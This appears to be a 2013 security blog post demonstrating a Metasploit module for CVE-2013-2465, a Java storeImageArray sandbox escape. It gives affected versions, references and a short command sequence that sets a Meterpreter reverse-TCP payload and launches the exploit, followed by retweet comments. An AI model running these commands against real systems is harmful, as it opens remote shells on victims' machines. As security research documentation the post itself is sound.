CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo

02/09/2013Exploits, MetasploitCVE-2013-2465, Java, Java 6 Update 45, Java 7 Update 21, Java SE 6, Java SE 7, Oracle, Oracle Java Critical Patch Update June 2013wow

Timeline :

Vulnerability discovered and reported to Packet Storm by Name Withheld
Vulnerability corrected by vendor the 2013-06-18
PoC provided by Packet Storm the 2013-08-12
Metasploit PoC provided the 2013-08-19

PoC provided by :

Name Withheld
sinn3r
juan vazquez

Reference(s) :

CVE-2013-2465
OSVDB-96269
Packet Storm Exploit 2013-0811-1
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before
Oracle Java SE 6 Update 45 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses an Invalid Array Indexing Vulnerability on the static function storeImageArray() function in order to cause a memory corruption and escape the Java Sandbox. The vulnerability affects Java version 7u21 and earlier. The module, which doesn’t bypass click2play, has been tested successfully on Java 7u21 on Windows and Linux systems.

Commands :

use exploit/multi/browser/java_storeimagearray
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid

16 thoughts on “CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo”

Pingback: Security News #0×51 | CyberOperations
tomsmaily says:

04/09/2013 at 14:53

RT @Hfuhs: CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo – http://t.co/JM2nkc8nDP
Pingback: Nova Falha em JAVA (CVE-2013-2465) | Chmod Security
Hfuhs says:

03/09/2013 at 15:17

CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo – http://t.co/JM2nkc8nDP
sar_consulting says:

03/09/2013 at 14:02

RT @virusbtn: #VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.…
CISecurity says:

03/09/2013 at 12:01

RT @virusbtn: #VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.…
ITSecurityPty says:

03/09/2013 at 11:14

RT @virusbtn: #VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.…
LCUK_Ltd says:

03/09/2013 at 11:07

RT @virusbtn: #VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.…
virusbtn says:

03/09/2013 at 10:54

#VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.co/B4z54Ghz5P
ubersec says:

03/09/2013 at 09:00

CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo: http://t.co/XdwhzqbmLI
itlkorea says:

03/09/2013 at 07:21

RT @eromang: CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo http://t.co/dSvLvUV5Gn
dum0k says:

03/09/2013 at 02:18

RT @eromang: CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo http://t.co/dSvLvUV5Gn
53cu2i7y says:

03/09/2013 at 02:18

RT @eromang: CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo http://t.co/dSvLvUV5Gn
SelsRoger says:

03/09/2013 at 00:39

RT @eromang: CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo http://t.co/dSvLvUV5Gn
rulobile says:

02/09/2013 at 23:31

RT @eromang: CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo http://t.co/dSvLvUV5Gn
eromang says:

02/09/2013 at 23:29

CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo http://t.co/dSvLvUV5Gn

Comments are closed.